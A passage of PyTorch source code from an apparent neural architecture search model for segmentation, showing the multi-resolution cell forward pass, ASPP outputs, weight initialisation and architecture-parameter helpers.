level32_new_1, level32_new_2 = self.cells[count] (torch.cat(level_32_dense[:-1], dim=1),
level_16[-1],
level_32[-1],
None)
level32_new = normalized_betas[layer][2][2] * level32_new_1 + normalized_betas[layer][3][1] * level32_new_2
count += 1
level_4.append (level4_new)
level_8.append (level8_new)
level_16.append (level16_new)
level_32.append (level32_new)
level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
level_16_dense.append(self.dense_preprocess[layer][2](level16_new))
level_32_dense.append(self.dense_preprocess[layer][3](level32_new))
if 3 in self.C_index:
C_output_4.append(self.aspp_4(level_4[-1]))
C_output_8.append(self.aspp_8(level_8[-1]))
C_output_16.append(self.aspp_16(level_16[-1]))
C_output_32.append(self.aspp_32(level_32[-1]))
elif layer not in self.C_index and layer < self._num_layers - 2:
level4_new_1, level4_new_2 = self.cells[count] (torch.cat(level_4_dense[:-1], dim=1),
None,
level_4[-1],
level_8[-1])
level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
count += 1
level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (torch.cat(level_8_dense[:-1], dim=1),
level_4[-1],
level_8[-1],
level_16[-1])
level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
count += 1
level16_new_1, level16_new_2, level16_new_3 = self.cells[count] (torch.cat(level_16_dense[:-1], dim=1),
level_8[-1],
level_16[-1],
level_32[-1])
level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2 + normalized_betas[layer][3][0] * level16_new_3
count += 1
level32_new_1, level32_new_2 = self.cells[count] (torch.cat(level_32_dense[:-1], dim=1),
level_16[-1],
level_32[-1],
None)
level32_new = normalized_betas[layer][2][2] * level32_new_1 + normalized_betas[layer][3][1] * level32_new_2
count += 1
level_4.append (level4_new)
level_8.append (level8_new)
level_16.append (level16_new)
level_32.append (level32_new)
level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
level_16_dense.append(self.dense_preprocess[layer][2](level16_new))
level_32_dense.append(self.dense_preprocess[layer][3](level32_new))
elif layer in self.C_index and layer < self._num_layers - 2:
level4_new_1, level4_new_2 = self.cells[count] (torch.cat(level_4_dense[:-1], dim=1),
None,
level_4[-1],
level_8[-1])
level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
count += 1
level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (torch.cat(level_8_dense[:-1], dim=1),
level_4[-1],
level_8[-1],
level_16[-1])
level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
count += 1
level16_new_1, level16_new_2, level16_new_3 = self.cells[count] (torch.cat(level_16_dense[:-1], dim=1),
level_8[-1],
level_16[-1],
level_32[-1])
level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2 + normalized_betas[layer][3][0] * level16_new_3
count += 1
level32_new_1, level32_new_2 = self.cells[count] (torch.cat(level_32_dense[:-1], dim=1),
level_16[-1],
level_32[-1],
None)
level32_new = normalized_betas[layer][2][2] * level32_new_1 + normalized_betas[layer][3][1] * level32_new_2
count += 1
level_4.append (level4_new)
level_8.append (level8_new)
level_16.append (level16_new)
level_32.append (level32_new)
level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
level_16_dense.append(self.dense_preprocess[layer][2](level16_new))
level_32_dense.append(self.dense_preprocess[layer][3](level32_new))
C_output_4.append(self.aspp_4(level_4[-1]))
C_output_8.append(self.aspp_8(level_8[-1]))
C_output_16.append(self.aspp_16(level_16[-1]))
C_output_32.append(self.aspp_32(level_32[-1]))
elif layer == self._num_layers-1:
level4_new_1, level4_new_2 = self.cells[count] (torch.cat(level_4_dense, dim=1),
None,
level_4[-1],
level_8[-1])
level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
count += 1
level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (torch.cat(level_8_dense, dim=1),
level_4[-1],
level_8[-1],
level_16[-1])
level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
count += 1
level16_new_1, level16_new_2, level16_new_3 = self.cells[count] (torch.cat(level_16_dense, dim=1),
level_8[-1],
level_16[-1],
level_32[-1])
level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2 + normalized_betas[layer][3][0] * level16_new_3
count += 1
level32_new_1, level32_new_2 = self.cells[count] (torch.cat(level_32_dense, dim=1),
level_16[-1],
level_32[-1],
None)
level32_new = normalized_betas[layer][2][2] * level32_new_1 + normalized_betas[layer][3][1] * level32_new_2
count += 1
level_4.append (level4_new)
level_8.append (level8_new)
level_16.append (level16_new)
level_32.append (level32_new)
else :
level4_new_1, level4_new_2 = self.cells[count] (torch.cat(level_4_dense[:-1], dim=1),
None,
level_4[-1],
level_8[-1])
level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
count += 1
level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (torch.cat(level_8_dense[:-1], dim=1),
level_4[-1],
level_8[-1],
level_16[-1])
level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
count += 1
level16_new_1, level16_new_2, level16_new_3 = self.cells[count] (torch.cat(level_16_dense[:-1], dim=1),
level_8[-1],
level_16[-1],
level_32[-1])
level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2 + normalized_betas[layer][3][0] * level16_new_3
count += 1
level32_new_1, level32_new_2 = self.cells[count] (torch.cat(level_32_dense[:-1], dim=1),
level_16[-1],
level_32[-1],
None)
level32_new = normalized_betas[layer][2][2] * level32_new_1 + normalized_betas[layer][3][1] * level32_new_2
count += 1
level_4.append (level4_new)
level_8.append (level8_new)
level_16.append (level16_new)
level_32.append (level32_new)
if layer < 3:
level_4 = level_4[-2:]
level_8 = level_8[-2:]
level_16 = level_16[-2:]
level_32 = level_32[-2:]
else:
level_4 = level_4[-1:]
level_8 = level_8[-1:]
level_16 = level_16[-1:]
level_32 = level_32[-1:]
C_output_4.append(self.aspp_4(level_4[-1]))
C_output_8.append(self.aspp_8(level_8[-1]))
C_output_16.append(self.aspp_16(level_16[-1]))
C_output_32.append(self.aspp_32(level_32[-1]))
C_sum_maps = []
upsample = nn.Upsample(size=x.size()[2:], mode='bilinear', align_corners=True)
for c in range(len(self.C_index) +1):
C_output_4[c] = upsample(C_output_4[c])
C_output_8[c] = upsample(C_output_8[c])
C_output_16[c] = upsample(C_output_16[c])
C_output_32[c] = upsample(C_output_32[c])
C_sum_maps.append(C_output_4[c] + C_output_8[c] + C_output_16[c] + C_output_32[c])
return C_sum_maps
def _init_weight(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
torch.nn.init.kaiming_normal_(m.weight)
elif isinstance(m, SynchronizedBatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
if m.affine != False:
m.weight.data.fill_(1)
m.bias.data.zero_()
def _initialize_alphas_betas(self):
betas = torch.tensor (1e-3*torch.randn(12, 4, 3).cuda(), requires_grad=True)
self._arch_parameters = [betas]
self._arch_param_names = ['betas']
[self.register_parameter(name, torch.nn.Parameter(param)) for name, param in zip(self._arch_param_names, self._arch_parameters)]
def arch_parameters (self) :
return [param for name, param in self.named_parameters() if name in self._arch_param_names]
def weight_parameters(self):
return [param for name, param in self.named_parameters() if name not in self._arch_param_names]
def main () :
model = Model_search (7, 12, None)
x = torch.tensor (torch.ones (4, 3, 224, 224))
if __name__ == '__main__' :
main () | 47.865629 | 171 | 0.467924 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.